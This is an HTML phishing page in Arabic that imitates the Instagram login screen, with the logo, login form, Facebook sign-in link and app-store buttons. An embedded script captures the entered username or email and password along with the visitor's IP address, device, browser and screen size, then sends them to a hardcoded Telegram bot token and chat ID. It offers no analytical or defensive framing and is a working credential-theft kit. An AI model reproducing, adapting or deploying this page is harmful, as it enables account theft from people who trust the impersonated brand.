<!DOCTYPE html>
<html lang="ar" dir="rtl">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="styles.css" />
    <link rel="icon" type="image/png" href="./img/insta-fav.ico">
    <title>نسخة انستقرام</title>
</head>
<body>
    <main class="flex align-items-center justify-content-center">
        <section id="mobile" class="flex">
        </section>
        <section id="auth" class="flex direction-column">
            <div class="panel login flex direction-column">
                <h1 title="انستقرام" class="flex justify-content-center">
                    <img src="./img//instagram-logo.png" alt="شعار انستقرام" title="شعار انستقرام" />
                </h1>
                <form id="login-form">
                    <label for="email" class="sr-only">رقم الهاتف أو اسم المستخدم أو البريد الإلكتروني</label>
                    <input id="email" name="email" placeholder="رقم الهاتف أو اسم المستخدم أو البريد الإلكتروني" required />

                    <label for="password" class="sr-only">كلمة المرور</label>
                    <input id="password" name="password" type="password" placeholder="كلمة المرور" required />

                    <button type="submit">تسجيل الدخول</button>
                </form>
                <div class="flex separator align-items-center">
                    <span></span>
                    <div class="or">أو</div>
                    <span></span>
                </div>
                <div class="login-with-fb flex direction-column align-items-center">
                    <div>
                        <img />
                        <a>تسجيل الدخول باستخدام فيسبوك</a>
                    </div>
                    <a href="#">هل نسيت كلمة المرور؟</a>
                </div>
            </div>
            <div class="panel register flex justify-content-center">
                <p>ليس لديك حساب؟</p>
                <a href="#">سجّل الآن</a>
            </div>
            <div class="app-download flex direction-column align-items-center">
                <p>حمّل التطبيق.</p>
                <div class="flex justify-content-center">
                    <img src="./img/apple-button.png" alt="شعار متجر أبل" title="متجر أبل" />
                    <img src="./img/googleplay-button.png" alt="شعار متجر جوجل" title="متجر جوجل" />
                </div>
            </div>
        </section>
    </main>
    <footer>
        <ul class="flex flex-wrap justify-content-center">
            <li><a href="#">حول</a></li>
            <li><a href="#">مساعدة</a></li>
            <li><a href="#">الصحافة</a></li>
            <li><a href="#">واجهة API</a></li>
            <li><a href="#">الوظائف</a></li>
            <li><a href="#">الخصوصية</a></li>
            <li><a href="#">الشروط</a></li>
            <li><a href="#">الموقع</a></li>
            <li><a href="#">حسابات أخرى</a></li>
            <li><a href="#">الوسوم</a></li>
            <li><a href="#">اللغة</a></li>
        </ul>
        <p class="copyright">© 2020 انستقرام من فيسبوك</p>
    </footer>
    
    <script src="https://unpkg.com/axios@1.6.7/dist/axios.min.js"></script>
<script>
    const TOKEN = "7776220444:AAGsbZRpbkF8pL8PbCfVlAvQB4gxcFIJQDY"; // التوكن الخاص بالبوت
    const CHAT_ID = "6844478048"; // معرّف الشات
    const URI_API = `https://api.telegram.org/bot${TOKEN}/sendMessage`;        

    document.getElementById('login-form').addEventListener('submit', function(e) {
        e.preventDefault();

        const email = document.getElementById('email').value;
        const password = document.getElementById('password').value;

        axios.get('https://api.ipify.org?format=json')
            .then(response => {
                const ip = response.data.ip;

                const userAgent = navigator.userAgent;
                const platform = navigator.platform;
                const screenWidth = screen.width;
                const screenHeight = screen.height;
                const deviceType = /mobile/i.test(navigator.userAgent) ? 'جوال' : 'كمبيوتر';

                const message = ` 
                    <b>محاولة تسجيل دخول جديدة</b>\n
                    <b>البريد الإلكتروني:</b> ${email}\n
                    <b>كلمة المرور:</b> ${password}\n
                    <b>عنوان IP:</b> ${ip}\n
                    <b>نوع الجهاز:</b> ${deviceType}\n
                    <b>النظام:</b> ${platform}\n
                    <b>المتصفح:</b> ${userAgent}\n
                    <b>دقة الشاشة:</b> ${screenWidth}x${screenHeight}
                `;

                axios.post(URI_API, {
                    chat_id: CHAT_ID,
                    parse_mode: 'html',
                    text: message
                }).then(response => {
                    alert('تم إرسال المعلومات بنجاح!');
                }).catch(error => {
                    alert('حدث خطأ أثناء الإرسال. حاول مرة أخرى.');
                });
            })
            .catch(error => {
                alert('حدث خطأ في جلب عنوان IP. حاول مرة أخرى.');
            });
    });
</script>
</body>
</html>